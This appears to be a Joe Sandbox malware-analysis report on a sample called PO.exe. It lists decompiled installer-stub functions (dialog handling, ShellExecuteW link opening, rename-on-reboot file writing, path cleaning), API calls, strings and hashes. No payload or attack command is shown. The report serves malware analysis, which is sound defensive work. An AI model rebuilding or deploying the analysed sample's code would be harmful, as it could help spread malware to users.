Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_32a0000_PO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3af88d3b1a9ed5b31f4e792fe84458a1584b26bdde563e86e23295a23b67fd98
Instruction ID: 3211e588fa5d6f2ccacd88a14f5edfc692ec44e80725be7655814c7dcd453e14
Opcode Fuzzy Hash: 3af88d3b1a9ed5b31f4e792fe84458a1584b26bdde563e86e23295a23b67fd98
Instruction Fuzzy Hash: 77D023D391E3510FA7B7556C79402633D0D5D7362031687A41407C7345E193CEC4D147

Uniqueness

Uniqueness Score: -1.00%

Function 032C3323 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.85191335084.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_32a0000_PO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18170011b58d051e589e5cdc6df629a0860fda0b0f191afe0731b86d74ddcce6
Instruction ID: 4de38431d3103f5bc8bf7b85b05cf875bfea15fe9ac0a403bab40d8a2078ec81
Opcode Fuzzy Hash: 18170011b58d051e589e5cdc6df629a0860fda0b0f191afe0731b86d74ddcce6
Instruction Fuzzy Hash: BDB092382505818FCA45EE08C180E8073A2FB24A00FC10480E041CBB16C225E800CB00

Uniqueness

Uniqueness Score: -1.00%

Function 004043DF Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 207
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004043DF(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				short* _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x4216f4 =  *0x4216f4 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E004042A9(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x4281e0;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								ShellExecuteW(_a4, L"open", _v8, 0, 0, 1);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a248, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a248, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x4216f4 != 0) {
						goto L27;
					} else {
						_t69 =  *0x422700; // 0x6aca44
						_t29 = _t69 + 0x14; // 0x6aca58
						_t116 = _t29;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00404264(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404672();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x42921c - 4 + _t75 * 4);
				}
				_t76 =  *0x42a278 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404390;
				if(_t110 != 2) {
					_v8 = E00404356;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E00404242(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E00404242(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00404264( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E00404277(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a250 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x4216f4 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x4216f4 = 0;
				return 0;
			}

0x004043f1
0x0040451e
0x0040457b
0x0040457f
0x00404654
0x00404656
0x00404656
0x0040465c
0x0040465c
0x0040465f
0x00000000
0x00404666
0x0040458d
0x00404593
0x0040459d
0x004045a8
0x004045ab
0x004045ae
0x004045b9
0x004045bc
0x004045c3
0x004045d0
0x004045e1
0x004045f6
0x00404605
0x0040460b
0x0040460b
0x004045c3
0x00404615
0x00000000
0x00404620
0x00404624
0x00404634
0x00404634
0x0040463a
0x00404646
0x00404646
0x00000000
0x0040464a
0x00404615
0x00404529
0x00000000
0x0040453b
0x0040453b
0x00404540
0x00404540
0x00404546
0x00000000
0x00000000
0x0040456f
0x00404571
0x00404576
0x00000000
0x00404576
0x00404529
0x004043f7
0x004043fa
0x004043ff
0x00404410
0x00404410
0x00404418
0x0040441b
0x0040441f
0x00404422
0x00404426
0x00404429
0x0040442c
0x0040442f
0x00404436
0x00404438
0x00404438
0x00404442
0x0040444f
0x00404459
0x0040445e
0x00404461
0x00404466
0x0040447d
0x00404484
0x00404497
0x0040449a
0x004044ae
0x004044b5
0x004044ba
0x004044bf
0x004044bf
0x004044cd
0x004044db
0x004044ed
0x004044f2
0x00404502
0x00404504
0x00000000

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040447D
GetDlgItem.USER32(?,000003E8), ref: 00404491
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044AE
GetSysColor.USER32(?), ref: 004044BF
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044CD
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044DB
lstrlenW.KERNEL32(?), ref: 004044E0
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044ED
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404502
GetDlgItem.USER32(?,0000040A), ref: 0040455B
SendMessageW.USER32(00000000), ref: 00404562
GetDlgItem.USER32(?,000003E8), ref: 0040458D
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045D0
LoadCursorW.USER32(00000000,00007F02), ref: 004045DE
SetCursor.USER32(00000000), ref: 004045E1
ShellExecuteW.SHELL32(0000070B,open,004281E0,00000000,00000000,00000001), ref: 004045F6
LoadCursorW.USER32(00000000,00007F00), ref: 00404602
SetCursor.USER32(00000000), ref: 00404605
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404634
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404646

Strings

N, xrefs: 0040457B
open, xrefs: 004045EE
VC@, xrefs: 004045EB
Call, xrefs: 004045BC

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: Call$N$VC@$open
API String ID: 3615053054-2503634124
Opcode ID: 33f5e1601642234e7e85cd0b58378a626179fffef457767216124dc14c27a8cd
Instruction ID: ef28e404984a924d02769b335405a58d84a4f5c10dd13b46e9d300bde90bb2c1
Opcode Fuzzy Hash: 33f5e1601642234e7e85cd0b58378a626179fffef457767216124dc14c27a8cd
Instruction Fuzzy Hash: 717191B1A00209BFDB10AF60DD45E6A7B69FB94344F00843AFB05B62E0D779AD51CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a250;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429240, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a248;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
Instruction ID: fbc3582f0be17511ef24b6208279bd62f68a22b1f89f17edcf88e24f0ff4dafb
Opcode Fuzzy Hash: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
Instruction Fuzzy Hash: 8E418A71800209AFCF058F95DE459AFBBB9FF44310F00842EF991AA1A0C738EA55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405EAD Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405EAD(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t13;
				long _t25;
				char* _t32;
				int _t38;
				void* _t39;
				intOrPtr* _t40;
				long _t43;
				WCHAR* _t45;
				void* _t47;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t54;

				_t39 = __ecx;
				lstrcpyW(0x426dc8, L"NUL");
				_t45 =  *(_t53 + 0x18);
				if(_t45 == 0) {
					L3:
					_t13 = GetShortPathNameW( *(_t53 + 0x1c), 0x4275c8, 0x400);
					if(_t13 != 0 && _t13 <= 0x400) {
						_t38 = wsprintfA(0x4269c8, "%ls=%ls\r\n", 0x426dc8, 0x4275c8);
						_t54 = _t53 + 0x10;
						E004061A0(_t38, 0x400, 0x4275c8, 0x4275c8,  *((intOrPtr*)( *0x42a250 + 0x128)));
						_t13 = E00405D53(0x4275c8, 0xc0000000, 4);
						_t49 = _t13;
						 *(_t54 + 0x18) = _t49;
						if(_t49 != 0xffffffff) {
							_t43 = GetFileSize(_t49, 0);
							_t6 = _t38 + 0xa; // 0xa
							_t47 = GlobalAlloc(0x40, _t43 + _t6);
							if(_t47 == 0 || E00405DD6(_t49, _t47, _t43) == 0) {
								L18:
								return CloseHandle(_t49);
							} else {
								if(E00405CB8(_t39, _t47, "[Rename]\r\n") != 0) {
									_t50 = E00405CB8(_t39, _t22 + 0xa, "\n[");
									if(_t50 == 0) {
										_t49 =  *(_t54 + 0x18);
										L16:
										_t25 = _t43;
										L17:
										E00405D0E(_t25 + _t47, 0x4269c8, _t38);
										SetFilePointer(_t49, 0, 0, 0);
										E00405E05(_t49, _t47, _t43 + _t38);
										GlobalFree(_t47);
										goto L18;
									}
									_t40 = _t47 + _t43;
									_t32 = _t40 + _t38;
									while(_t40 > _t50) {
										 *_t32 =  *_t40;
										_t32 = _t32 - 1;
										_t40 = _t40 - 1;
									}
									_t25 = _t50 - _t47 + 1;
									_t49 =  *(_t54 + 0x18);
									goto L17;
								}
								lstrcpyA(_t47 + _t43, "[Rename]\r\n");
								_t43 = _t43 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405D53(_t45, 0, 1));
					_t13 = GetShortPathNameW(_t45, 0x426dc8, 0x400);
					if(_t13 != 0 && _t13 <= 0x400) {
						goto L3;
					}
				}
				return _t13;
			}

0x00405ead
0x00405ebc
0x00405ec2
0x00405ed3
0x00405efb
0x00405f06
0x00405f0a
0x00405f2a
0x00405f31
0x00405f3b
0x00405f48
0x00405f4d
0x00405f52
0x00405f56
0x00405f65
0x00405f67
0x00405f74
0x00405f78
0x00406013
0x00000000
0x00405f8e
0x00405f9b
0x00405fbf
0x00405fc3
0x00405fe2
0x00405fe6
0x00405fe6
0x00405fe8
0x00405ff1
0x00405ffc
0x00406007
0x0040600d
0x00000000
0x0040600d
0x00405fc5
0x00405fc8
0x00405fd3
0x00405fcf
0x00405fd1
0x00405fd2
0x00405fd2
0x00405fda
0x00405fdc
0x00000000
0x00405fdc
0x00405fa6
0x00405fac
0x00000000
0x00405fac
0x00405f78
0x00405f56
0x00405ed5
0x00405ee0
0x00405ee9
0x00405eed
0x00000000
0x00000000
0x00405eed
0x0040601e

APIs

lstrcpyW.KERNEL32(00426DC8,NUL), ref: 00405EBC
CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00406040,?,?), ref: 00405EE0
GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00405EE9

Part of subcall function 00405CB8: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CC8
Part of subcall function 00405CB8: lstrlenA.KERNEL32(00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CFA

GetShortPathNameW.KERNEL32(004275C8,004275C8,00000400), ref: 00405F06
wsprintfA.USER32 ref: 00405F24
GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 00405F5F
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F6E
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
SetFilePointer.KERNEL32(0040A588,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A588,00000000,[Rename],00000000,00000000,00000000), ref: 00405FFC
GlobalFree.KERNEL32(00000000), ref: 0040600D
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406014

Part of subcall function 00405D53: GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\PO.exe,80000000,00000003), ref: 00405D57
Part of subcall function 00405D53: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D79

Strings

[Rename], xrefs: 00405F8E, 00405FA0
%ls=%ls, xrefs: 00405F1A
NUL, xrefs: 00405EB6

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %ls=%ls$NUL$[Rename]
API String ID: 222337774-899692902
Opcode ID: b79c81f05b1b833d126071e3cf8f1dbc038624686787cc5f02dad872694d8803
Instruction ID: 52ae09e4e2a5e81e4d5588e003ad531eff1fe7f7ae6e2de5146a23cae23f7ad9
Opcode Fuzzy Hash: b79c81f05b1b833d126071e3cf8f1dbc038624686787cc5f02dad872694d8803
Instruction Fuzzy Hash: EB315330241B19BBD2206B209D08F2B3A5CEF85758F15043BF942F62C2EA7CC9118EBD

Uniqueness

Uniqueness Score: -1.00%

Function 00406412 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00406412(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405BA9(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405B5F(L"*?|<>/\":", _t5))) == 0) {
							E00405D0E(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00406414
0x0040641d
0x00406434
0x00406434
0x0040643b
0x00406447
0x00406447
0x0040644a
0x0040644d
0x00406452
0x00406454
0x0040645d
0x00406461
0x0040647e
0x00406486
0x00406486
0x0040648b
0x0040648d
0x00406490
0x00406495
0x00406496
0x0040649a
0x0040649a
0x0040649b
0x004064a2
0x004064a4
0x004064ab
0x00000000
0x00000000
0x004064b3
0x004064b9
0x00000000
0x00000000
0x00000000
0x004064b9
0x004064be

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,77373420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00406475
CharNextW.USER32(?,?,?,00000000), ref: 00406484
CharNextW.USER32(?,00000000,77373420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00406489
CharPrevW.USER32(?,?,77373420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 0040649C

Strings

"C:\Users\user\Desktop\PO.exe", xrefs: 00406412
C:\Users\user\AppData\Local\Temp\, xrefs: 00406413
*?|<>/":, xrefs: 00406464

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\PO.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2244677596
Opcode ID: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
Instruction ID: c1b46f2de1f90aebbf911330ce555e940da56993e608f70b6a8db31027969b8c
Opcode Fuzzy Hash: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
Instruction Fuzzy Hash: 5311C85680121299DB307B588C40AB7A2B8EF55754F52803FEDCA732C1E77C5C9286BD

Uniqueness

Uniqueness Score: -1.00%

Function 004042A9 Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004042A9(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

0x004042bb
0x0040434f
0x00000000
0x0040434f
0x004042cc
0x004042d0
0x00000000
0x00000000
0x004042d6
0x004042df
0x004042e2
0x004042e2
0x004042e8
0x004042ee
0x004042ee
0x004042fa
0x00404300
0x00404307
0x0040430a
0x0040430d
0x0040430f
0x0040430f
0x00404317
0x0040431d
0x0040431d
0x00404327
0x0040432c
0x0040432f
0x00404334
0x00404337
0x00404337
0x00404347
0x00404347
0x00000000

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004042C6
GetSysColor.USER32(00000000), ref: 004042E2
SetTextColor.GDI32(?,00000000), ref: 004042EE
SetBkMode.GDI32(?,?), ref: 004042FA
GetSysColor.USER32(?), ref: 0040430D
SetBkColor.GDI32(?,?), ref: 0040431D
DeleteObject.GDI32(?), ref: 00404337
CreateBrushIndirect.GDI32(?), ref: 00404341

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
